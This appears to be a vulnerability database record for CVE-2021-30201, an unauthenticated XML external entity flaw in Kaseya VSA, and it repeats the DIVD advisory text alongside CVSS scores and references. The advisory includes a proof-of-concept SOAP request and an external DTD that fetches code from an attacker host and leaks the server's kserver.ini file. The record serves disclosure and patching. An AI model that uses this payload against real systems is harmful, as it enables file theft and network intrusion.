GSD-2021-30201
Vulnerability from gsd - Updated: 2023-12-13 01:23Details
The API /vsaWS/KaseyaWS.asmx can be used to submit XML to the system. When this XML is processed (external) entities are insecurely processed and fetched by the system and returned to the attacker. Detailed description Given the following request: ``` POST /vsaWS/KaseyaWS.asmx HTTP/1.1 Content-Type: text/xml;charset=UTF-8 Host: 192.168.1.194:18081 Content-Length: 406 <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:kas="KaseyaWS"> <soapenv:Header/> <soapenv:Body> <kas:PrimitiveResetPassword> <!--type: string--> <kas:XmlRequest><![CDATA[<!DOCTYPE data SYSTEM "http://192.168.1.170:8080/oob.dtd"><data>&send;</data>]]> </kas:XmlRequest> </kas:PrimitiveResetPassword> </soapenv:Body> </soapenv:Envelope> ``` And the following XML file hosted at http://192.168.1.170/oob.dtd: ``` <!ENTITY % file SYSTEM "file://c:\\kaseya\\kserver\\kserver.ini"> <!ENTITY % eval "<!ENTITY % error SYSTEM 'file:///nonexistent/%file;'>"> %eval; %error; ``` The server will fetch this XML file and process it, it will read the file c:\\kaseya\\kserver\\kserver.ini and returns the content in the server response like below. Response: ``` HTTP/1.1 500 Internal Server Error Cache-Control: private Content-Type: text/xml; charset=utf-8 Date: Fri, 02 Apr 2021 10:07:38 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 2677 <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><soap:Body><soap:Fault><faultcode>soap:Server</faultcode><faultstring>Server was unable to process request. ---> There is an error in XML document (24, -1000).\r\n\r\nSystem.Xml.XmlException: Fragment identifier '######################################################################## # This is the configuration file for the KServer. # Place it in the same directory as the KServer executable # A blank line or new valid section header [] terminates each section. # Comment lines start with ; or # ######################################################################## <snip> ``` Security issues discovered --- * The API insecurely resolves external XML entities * The API has an overly verbose error response Impact --- Using this vulnerability an attacker can read any file on the server the webserver process can read. Additionally, it can be used to perform HTTP(s) requests into the local network and thus use the Kaseya system to pivot into the local network.
Aliases
Aliases
{
"GSD": {
"alias": "CVE-2021-30201",
"description": "An XML External Entity (XXE) issue exists in Kaseya VSA before 9.5.6.",
"id": "GSD-2021-30201"
},
"gsd": {
"metadata": {
"exploitCode": "unknown",
"remediation": "unknown",
"reportConfidence": "confirmed",
"type": "vulnerability"
},
"osvSchema": {
"aliases": [
"CVE-2021-30201"
],
"details": "The API /vsaWS/KaseyaWS.asmx can be used to submit XML to the system. When this XML is processed (external) entities are insecurely processed and fetched by the system and returned to the attacker. Detailed description Given the following request: ``` POST /vsaWS/KaseyaWS.asmx HTTP/1.1 Content-Type: text/xml;charset=UTF-8 Host: 192.168.1.194:18081 Content-Length: 406 \u003csoapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:kas=\"KaseyaWS\"\u003e \u003csoapenv:Header/\u003e \u003csoapenv:Body\u003e \u003ckas:PrimitiveResetPassword\u003e \u003c!--type: string--\u003e \u003ckas:XmlRequest\u003e\u003c![CDATA[\u003c!DOCTYPE data SYSTEM \"http://192.168.1.170:8080/oob.dtd\"\u003e\u003cdata\u003e\u0026send;\u003c/data\u003e]]\u003e \u003c/kas:XmlRequest\u003e \u003c/kas:PrimitiveResetPassword\u003e \u003c/soapenv:Body\u003e \u003c/soapenv:Envelope\u003e ``` And the following XML file hosted at http://192.168.1.170/oob.dtd: ``` \u003c!ENTITY % file SYSTEM \"file://c:\\\\kaseya\\\\kserver\\\\kserver.ini\"\u003e \u003c!ENTITY % eval \"\u003c!ENTITY \u0026#x25; error SYSTEM \u0027file:///nonexistent/%file;\u0027\u003e\"\u003e %eval; %error; ``` The server will fetch this XML file and process it, it will read the file c:\\\\kaseya\\\\kserver\\\\kserver.ini and returns the content in the server response like below. Response: ``` HTTP/1.1 500 Internal Server Error Cache-Control: private Content-Type: text/xml; charset=utf-8 Date: Fri, 02 Apr 2021 10:07:38 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 2677 \u003c?xml version=\"1.0\" encoding=\"utf-8\"?\u003e\u003csoap:Envelope xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\"\u003e\u003csoap:Body\u003e\u003csoap:Fault\u003e\u003cfaultcode\u003esoap:Server\u003c/faultcode\u003e\u003cfaultstring\u003eServer was unable to process request. ---\u0026gt; There is an error in XML document (24, -1000).\\r\\n\\r\\nSystem.Xml.XmlException: Fragment identifier \u0027######################################################################## # This is the configuration file for the KServer. # Place it in the same directory as the KServer executable # A blank line or new valid section header [] terminates each section. # Comment lines start with ; or # ######################################################################## \u003csnip\u003e ``` Security issues discovered --- * The API insecurely resolves external XML entities * The API has an overly verbose error response Impact --- Using this vulnerability an attacker can read any file on the server the webserver process can read. Additionally, it can be used to perform HTTP(s) requests into the local network and thus use the Kaseya system to pivot into the local network.",
"id": "GSD-2021-30201",
"modified": "2023-12-13T01:23:31.510824Z",
"schema_version": "1.4.0"
}
},
"namespaces": {
"cve.org": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2021-30201",
"STATE": "PUBLIC",
"TITLE": "Unauthenticated XML External Entity vulnerability in Kaseya VSA \u003c v9.5.6"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"credit": [
{
"lang": "eng",
"value": "Discovered by Wietse Boonstra of DIVD"
},
{
"lang": "eng",
"value": "Additional research by Frank Breedijk of DIVD"
}
],
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "The API /vsaWS/KaseyaWS.asmx can be used to submit XML to the system. When this XML is processed (external) entities are insecurely processed and fetched by the system and returned to the attacker. Detailed description Given the following request: ``` POST /vsaWS/KaseyaWS.asmx HTTP/1.1 Content-Type: text/xml;charset=UTF-8 Host: 192.168.1.194:18081 Content-Length: 406 \u003csoapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:kas=\"KaseyaWS\"\u003e \u003csoapenv:Header/\u003e \u003csoapenv:Body\u003e \u003ckas:PrimitiveResetPassword\u003e \u003c!--type: string--\u003e \u003ckas:XmlRequest\u003e\u003c![CDATA[\u003c!DOCTYPE data SYSTEM \"http://192.168.1.170:8080/oob.dtd\"\u003e\u003cdata\u003e\u0026send;\u003c/data\u003e]]\u003e \u003c/kas:XmlRequest\u003e \u003c/kas:PrimitiveResetPassword\u003e \u003c/soapenv:Body\u003e \u003c/soapenv:Envelope\u003e ``` And the following XML file hosted at http://192.168.1.170/oob.dtd: ``` \u003c!ENTITY % file SYSTEM \"file://c:\\\\kaseya\\\\kserver\\\\kserver.ini\"\u003e \u003c!ENTITY % eval \"\u003c!ENTITY \u0026#x25; error SYSTEM \u0027file:///nonexistent/%file;\u0027\u003e\"\u003e %eval; %error; ``` The server will fetch this XML file and process it, it will read the file c:\\\\kaseya\\\\kserver\\\\kserver.ini and returns the content in the server response like below. Response: ``` HTTP/1.1 500 Internal Server Error Cache-Control: private Content-Type: text/xml; charset=utf-8 Date: Fri, 02 Apr 2021 10:07:38 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 2677 \u003c?xml version=\"1.0\" encoding=\"utf-8\"?\u003e\u003csoap:Envelope xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\"\u003e\u003csoap:Body\u003e\u003csoap:Fault\u003e\u003cfaultcode\u003esoap:Server\u003c/faultcode\u003e\u003cfaultstring\u003eServer was unable to process request. ---\u0026gt; There is an error in XML document (24, -1000).\\r\\n\\r\\nSystem.Xml.XmlException: Fragment identifier \u0027######################################################################## # This is the configuration file for the KServer. # Place it in the same directory as the KServer executable # A blank line or new valid section header [] terminates each section. # Comment lines start with ; or # ######################################################################## \u003csnip\u003e ``` Security issues discovered --- * The API insecurely resolves external XML entities * The API has an overly verbose error response Impact --- Using this vulnerability an attacker can read any file on the server the webserver process can read. Additionally, it can be used to perform HTTP(s) requests into the local network and thus use the Kaseya system to pivot into the local network."
}
]
},
"generator": {
"engine": "Vulnogram 0.0.9"
},
"impact": {
"cvss": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/",
"refsource": "CONFIRM",
"url": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/"
},
{
"name": "https://helpdesk.kaseya.com/hc/en-gb/articles/360019966738-9-5-6-Feature-Release-8-May-2021",
"refsource": "CONFIRM",
"url": "https://helpdesk.kaseya.com/hc/en-gb/articles/360019966738-9-5-6-Feature-Release-8-May-2021"
},
{
"name": "https://csirt.divd.nl/DIVD-2021-00011",
"refsource": "CONFIRM",
"url": "https://csirt.divd.nl/DIVD-2021-00011"
},
{
"name": "https://csirt.divd.nl/CVE-2021-30201",
"refsource": "CONFIRM",
"url": "https://csirt.divd.nl/CVE-2021-30201"
}
]
},
"solution": [
{
"lang": "eng",
"value": "Upgrade to version 9.5.6 or higher"
}
],
"source": {
"advisory": "DIVD-2021-00011",
"discovery": "INTERNAL"
}
},
"nvd.nist.gov": {
"configurations": {
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:kaseya:vsa:*:*:*:*:-:*:*:*",
"cpe_name": [],
"versionEndExcluding": "9.5.6",
"vulnerable": true
}
],
"operator": "OR"
}
]
},
"cve": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2021-30201"
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "en",
"value": "The API /vsaWS/KaseyaWS.asmx can be used to submit XML to the system. When this XML is processed (external) entities are insecurely processed and fetched by the system and returned to the attacker. Detailed description Given the following request: ``` POST /vsaWS/KaseyaWS.asmx HTTP/1.1 Content-Type: text/xml;charset=UTF-8 Host: 192.168.1.194:18081 Content-Length: 406 \u003csoapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:kas=\"KaseyaWS\"\u003e \u003csoapenv:Header/\u003e \u003csoapenv:Body\u003e \u003ckas:PrimitiveResetPassword\u003e \u003c!--type: string--\u003e \u003ckas:XmlRequest\u003e\u003c![CDATA[\u003c!DOCTYPE data SYSTEM \"http://192.168.1.170:8080/oob.dtd\"\u003e\u003cdata\u003e\u0026send;\u003c/data\u003e]]\u003e \u003c/kas:XmlRequest\u003e \u003c/kas:PrimitiveResetPassword\u003e \u003c/soapenv:Body\u003e \u003c/soapenv:Envelope\u003e ``` And the following XML file hosted at http://192.168.1.170/oob.dtd: ``` \u003c!ENTITY % file SYSTEM \"file://c:\\\\kaseya\\\\kserver\\\\kserver.ini\"\u003e \u003c!ENTITY % eval \"\u003c!ENTITY \u0026#x25; error SYSTEM \u0027file:///nonexistent/%file;\u0027\u003e\"\u003e %eval; %error; ``` The server will fetch this XML file and process it, it will read the file c:\\\\kaseya\\\\kserver\\\\kserver.ini and returns the content in the server response like below. Response: ``` HTTP/1.1 500 Internal Server Error Cache-Control: private Content-Type: text/xml; charset=utf-8 Date: Fri, 02 Apr 2021 10:07:38 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 2677 \u003c?xml version=\"1.0\" encoding=\"utf-8\"?\u003e\u003csoap:Envelope xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\"\u003e\u003csoap:Body\u003e\u003csoap:Fault\u003e\u003cfaultcode\u003esoap:Server\u003c/faultcode\u003e\u003cfaultstring\u003eServer was unable to process request. ---\u0026gt; There is an error in XML document (24, -1000).\\r\\n\\r\\nSystem.Xml.XmlException: Fragment identifier \u0027######################################################################## # This is the configuration file for the KServer. # Place it in the same directory as the KServer executable # A blank line or new valid section header [] terminates each section. # Comment lines start with ; or # ######################################################################## \u003csnip\u003e ``` Security issues discovered --- * The API insecurely resolves external XML entities * The API has an overly verbose error response Impact --- Using this vulnerability an attacker can read any file on the server the webserver process can read. Additionally, it can be used to perform HTTP(s) requests into the local network and thus use the Kaseya system to pivot into the local network."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "en",
"value": "CWE-611"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/",
"refsource": "MISC",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/"
},
{
"name": "https://helpdesk.kaseya.com/hc/en-gb/articles/360019966738-9-5-6-Feature-Release-8-May-2021",
"refsource": "CONFIRM",
"tags": [
"Release Notes",
"Vendor Advisory"
],
"url": "https://helpdesk.kaseya.com/hc/en-gb/articles/360019966738-9-5-6-Feature-Release-8-May-2021"
},
{
"name": "https://csirt.divd.nl/CVE-2021-30201",
"refsource": "CONFIRM",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://csirt.divd.nl/CVE-2021-30201"
},
{
"name": "https://csirt.divd.nl/DIVD-2021-00011",
"refsource": "CONFIRM",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://csirt.divd.nl/DIVD-2021-00011"
}
]
}
},
"impact": {
"baseMetricV2": {
"acInsufInfo": false,
"cvssV2": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"userInteractionRequired": false
},
"baseMetricV3": {
"cvssV3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6
}
},
"lastModifiedDate": "2022-04-29T18:14Z",
"publishedDate": "2021-07-09T14:15Z"
}
}
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…